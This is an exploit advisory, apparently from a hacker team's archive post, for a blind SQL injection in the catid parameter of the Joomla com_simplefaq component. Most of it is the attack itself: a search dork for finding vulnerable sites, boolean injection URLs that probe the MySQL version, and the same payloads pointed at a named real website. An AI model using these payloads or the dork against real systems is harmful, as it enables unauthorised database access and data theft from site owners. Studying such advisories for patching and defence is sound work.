The Joomla Simple FAQ component suffers from a remote blind SQL injection vulnerability.
825557192d4925e60997c3f0e62d1996c2ac0885bf9e222b9dab631dc515c97d
Joomla Component com_simplefaq (catid) Blind Sql Injection Vulnerability
=========================================================================
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Team : Sec Attack Team
.:. Email : F.Hack@w.cn
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_simplefaq
.:. Script Download: http://www.parkviewconsultants.com/component/option,com_mosipn/page,free/
.:. Bug Type : Blind Sql Injection
.:. Dork : inurl:"com_simplefaq"
.:. Date : 30/1/2010
#############################################
===[ Exploit ]===
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70[Blind Injection]&page=1#FAQ5
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True
www.site.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False
===[ Example ]===
http://anyunit.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=5&page=1#FAQ5 >>>> True
http://anyunit.com/index.php?option=com_simplefaq&func=display&Itemid=49&catid=70+and substring(@@version,1,1)=4&page=1#FAQ5 >>>> False
#############################################
Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack
________________________________
Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>